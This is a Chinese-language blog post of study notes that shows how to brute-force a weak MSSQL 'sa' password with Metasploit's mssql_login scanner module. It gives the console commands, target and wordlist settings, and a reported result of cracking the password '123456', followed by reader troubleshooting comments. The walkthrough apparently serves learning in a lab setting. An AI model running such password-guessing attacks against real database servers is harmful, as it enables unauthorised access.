msf暴力破解mssql弱密码

学习笔记 无标签 2018-05-8 阅读:6473

   
利用msf爆破mssql,用的是msf的mssql_login.


msfconsole
search mssql_login
use auxiliary/scanner/mssql/mssql_login

   
1.进msf控制台 

   
2.查找mssql_login 模块 

   
3.使用mssql_login模块

11.png

   
4.设置主要参数。

12.png

set RHOSTS 192.168.1.80 //设置攻击目标
set THREADS 50 //设置线程
set USERNAME sa //设置数据库用户名,mssql默认最高权限为sa
set PASS_FILE /root/pass.txt //设置爆破字典,字典强成功率高
run

13.png

   
ip前面写错了,重新设置。。。执行结果,得到密码123456。[白眼]


生成海报
版权声明

本文基于《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权
文章链接:https://www.fxnetw.com/14.html (转载时请注明本文出处及文章链接)


如果觉得我的文章对你有用,请随意赞赏

5条评论

    lbm

    为什么whit password那显示空的

    游客 Windows10 314 天前回复

      风雪
      @lbm

      哪行?

      作者 Windows10 310 天前回复

    null

    为什么我exploit,老提示我user_file有问题

    游客 安卓棉花糖 610 天前回复

      风雪
      @null

      要么设置USERNAME要么就USER_FILE

      作者 安卓派 606 天前回复

    assignment代写

    我认为在这个模块中,数据库缓存的根目录中有研究的地方。你可以进入根目录,并可以看到在那里工作的所有程序。使用....进行访问并获取所有信息。

    游客 Windows10 779 天前回复